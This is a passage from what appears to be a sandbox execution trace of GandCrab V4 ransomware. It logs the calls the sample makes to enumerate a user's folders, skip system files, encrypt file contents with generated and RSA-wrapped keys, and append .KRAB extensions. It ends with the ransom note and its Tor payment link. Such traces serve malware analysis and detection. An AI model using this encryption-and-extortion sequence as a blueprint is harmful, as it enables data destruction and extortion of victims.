dwFreeType=0x8000) returned 1 [0057.628] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.628] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned 101 [0057.628] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*" [0057.628] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*", lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 0xfbe0a0 [0057.628] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.628] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0057.628] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.628] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.628] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0057.628] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0057.628] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0057.628] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\d2ca4a08d2ca4dee3d.lock" [0057.629] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.629] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 129 [0057.629] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\d2ca4a08d2ca4dee3d.lock") returned 124 [0057.629] lstrlenW (lpString=".lock") returned 5 [0057.629] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.629] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0057.630] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.630] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.630] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0057.630] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0057.630] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0057.630] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\KRAB-DECRYPT.txt" [0057.630] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.630] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\KRAB-DECRYPT.txt.KRAB") returned 122 [0057.630] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\KRAB-DECRYPT.txt") returned 117 [0057.630] lstrlenW (lpString=".txt") returned 4 [0057.630] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.631] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0057.631] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.631] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\KRAB-DECRYPT.txt") returned 117 [0057.631] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\KRAB-DECRYPT.txt") returned 117 [0057.631] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0057.631] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0057.631] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0057.631] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0057.631] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0057.631] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0057.631] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0057.631] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0057.631] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0057.631] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0057.631] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.631] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0057.631] lstrcmpW (lpString1="settings.sol", lpString2=".") returned 1 [0057.632] lstrcmpW (lpString1="settings.sol", lpString2="..") returned 1 [0057.632] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpString2="settings.sol" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" [0057.632] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.632] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.KRAB") returned 118 [0057.632] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned 113 [0057.632] lstrlenW (lpString=".sol") returned 4 [0057.632] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.632] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".sol ") returned 5 [0057.632] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.632] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned 113 [0057.632] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned 113 [0057.632] lstrcmpiW (lpString1="settings.sol", lpString2="desktop.ini") returned 1 [0057.633] lstrcmpiW (lpString1="settings.sol", lpString2="autorun.inf") returned 1 [0057.633] lstrcmpiW (lpString1="settings.sol", lpString2="ntuser.dat") returned 1 [0057.633] lstrcmpiW (lpString1="settings.sol", lpString2="iconcache.db") returned 1 [0057.633] lstrcmpiW (lpString1="settings.sol", lpString2="bootsect.bak") returned 1 [0057.633] lstrcmpiW (lpString1="settings.sol", lpString2="boot.ini") returned 1 [0057.633] lstrcmpiW (lpString1="settings.sol", lpString2="ntuser.dat.log") returned 1 [0057.633] lstrcmpiW (lpString1="settings.sol", lpString2="thumbs.db") returned -1 [0057.633] lstrcmpiW (lpString1="settings.sol", lpString2="KRAB-DECRYPT.html") returned 1 [0057.633] lstrcmpiW (lpString1="settings.sol", lpString2="KRAB-DECRYPT.txt") returned 1 [0057.633] lstrcmpiW (lpString1="settings.sol", lpString2="CRAB-DECRYPT.txt") returned 1 [0057.633] lstrcmpiW (lpString1="settings.sol", lpString2="ntldr") returned 1 [0057.633] lstrcmpiW (lpString1="settings.sol", lpString2="NTDETECT.COM") returned 1 [0057.633] lstrcmpiW (lpString1="settings.sol", lpString2="Bootfont.bin") returned 1 [0057.633] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.633] CryptAcquireContextW (in: phProv=0x338dfb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dfb4*=0xfbca90) returned 1 [0057.634] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.634] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.634] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.634] CryptGenRandom (in: hProv=0xfbca90, dwLen=0x20, pbBuffer=0x338e04c | out: pbBuffer=0x338e04c) returned 1 [0057.634] CryptReleaseContext (hProv=0xfbca90, dwFlags=0x0) returned 1 [0057.634] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.634] CryptAcquireContextW (in: phProv=0x338dfb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dfb4*=0xfbca90) returned 1 [0057.635] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.635] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.635] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.635] CryptGenRandom (in: hProv=0xfbca90, dwLen=0x8, pbBuffer=0x338e06c | out: pbBuffer=0x338e06c) returned 1 [0057.635] CryptReleaseContext (hProv=0xfbca90, dwFlags=0x0) returned 1 [0057.635] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.636] CryptAcquireContextW (in: phProv=0x338dfac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dfac*=0xfbca90) returned 1 [0057.637] CryptImportKey (in: hProv=0xfbca90, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dfb0 | out: phKey=0x338dfb0*=0xfbd4e0) returned 1 [0057.637] CryptGetKeyParam (in: hKey=0xfbd4e0, dwParam=0x8, pbData=0x338dfa4, pdwDataLen=0x338dfa8, dwFlags=0x0 | out: pbData=0x338dfa4*=0x800, pdwDataLen=0x338dfa8*=0x4) returned 1 [0057.637] CryptEncrypt (in: hKey=0xfbd4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dfdc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dfdc*=0x100) returned 1 [0057.637] GetLastError () returned 0x0 [0057.637] CryptDestroyKey (hKey=0xfbd4e0) returned 1 [0057.637] CryptReleaseContext (hProv=0xfbca90, dwFlags=0x0) returned 1 [0057.637] CryptAcquireContextW (in: phProv=0x338dfac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dfac*=0xfbca90) returned 1 [0057.638] CryptImportKey (in: hProv=0xfbca90, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dfb0 | out: phKey=0x338dfb0*=0xfbd6e0) returned 1 [0057.638] CryptGetKeyParam (in: hKey=0xfbd6e0, dwParam=0x8, pbData=0x338dfa4, pdwDataLen=0x338dfa8, dwFlags=0x0 | out: pbData=0x338dfa4*=0x800, pdwDataLen=0x338dfa8*=0x4) returned 1 [0057.638] CryptEncrypt (in: hKey=0xfbd6e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dfdc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dfdc*=0x100) returned 1 [0057.638] GetLastError () returned 0x0 [0057.638] CryptDestroyKey (hKey=0xfbd6e0) returned 1 [0057.638] CryptReleaseContext (hProv=0xfbca90, dwFlags=0x0) returned 1 [0057.638] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0057.639] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0057.639] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0057.639] ReadFile (in: hFile=0x460, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e07c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e07c*=0x1fa, lpOverlapped=0x0) returned 1 [0057.655] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffffe06, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.655] WriteFile (in: hFile=0x460, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x1fa, lpNumberOfBytesWritten=0x338e078, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e078*=0x1fa, lpOverlapped=0x0) returned 1 [0057.655] WriteFile (in: hFile=0x460, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e078, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e078*=0x208, lpOverlapped=0x0) returned 1 [0057.666] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.670] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.670] CloseHandle (hObject=0x460) returned 1 [0057.671] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.671] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.krab")) returned 1 [0057.675] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.676] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 0 [0057.676] FindClose (in: hFindFile=0xfbe0a0 | out: hFindFile=0xfbe0a0) returned 1 [0057.677] CloseHandle (hObject=0x458) returned 1 [0057.677] FindNextFileW (in: hFindFile=0xfbdf20, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0 [0057.677] FindClose (in: hFindFile=0xfbdf20 | out: hFindFile=0xfbdf20) returned 1 [0057.677] CloseHandle (hObject=0x450) returned 1 [0057.677] FindNextFileW (in: hFindFile=0xfbd3a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0057.677] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0057.677] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0057.677] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\KRAB-DECRYPT.txt" [0057.677] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.678] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\KRAB-DECRYPT.txt.KRAB") returned 106 [0057.678] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\KRAB-DECRYPT.txt") returned 101 [0057.678] lstrlenW (lpString=".txt") returned 4 [0057.678] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.678] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0057.678] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.678] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\KRAB-DECRYPT.txt") returned 101 [0057.678] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\KRAB-DECRYPT.txt") returned 101 [0057.678] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0057.678] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0057.678] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0057.678] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0057.678] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0057.678] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0057.679] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0057.679] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0057.679] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0057.679] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0057.679] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.679] FindNextFileW (in: hFindFile=0xfbd3a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0 [0057.679] FindClose (in: hFindFile=0xfbd3a0 | out: hFindFile=0xfbd3a0) returned 1 [0057.679] CloseHandle (hObject=0x448) returned 1 [0057.679] FindNextFileW (in: hFindFile=0xfbd860, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0057.679] FindClose (in: hFindFile=0xfbd860 | out: hFindFile=0xfbd860) returned 1 [0057.679] CloseHandle (hObject=0x440) returned 1 [0057.679] FindNextFileW (in: hFindFile=0xfbd360, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0057.680] FindClose (in: hFindFile=0xfbd360 | out: hFindFile=0xfbd360) returned 1 [0057.680] CloseHandle (hObject=0x3ac) returned 1 [0057.680] FindNextFileW (in: hFindFile=0xfbd4a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0057.680] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0057.680] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0057.680] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\KRAB-DECRYPT.txt" [0057.680] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.680] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\KRAB-DECRYPT.txt.KRAB") returned 70 [0057.680] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\KRAB-DECRYPT.txt") returned 65 [0057.680] lstrlenW (lpString=".txt") returned 4 [0057.680] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.680] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0057.681] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.681] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\KRAB-DECRYPT.txt") returned 65 [0057.681] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\KRAB-DECRYPT.txt") returned 65 [0057.681] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0057.681] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0057.681] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0057.681] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0057.681] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0057.681] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0057.681] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0057.681] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0057.681] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0057.681] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0057.681] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.681] FindNextFileW (in: hFindFile=0xfbd4a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0 [0057.681] FindClose (in: hFindFile=0xfbd4a0 | out: hFindFile=0xfbd4a0) returned 1 [0057.681] CloseHandle (hObject=0x43c) returned 1 [0057.682] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0057.682] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0057.682] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0057.682] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="Microsoft" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft" [0057.682] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\" [0057.682] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0057.682] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0057.682] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0057.682] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0057.682] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0057.682] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.682] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.683] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\\\KRAB-DECRYPT.txt") returned 65 [0057.683] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0057.683] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB 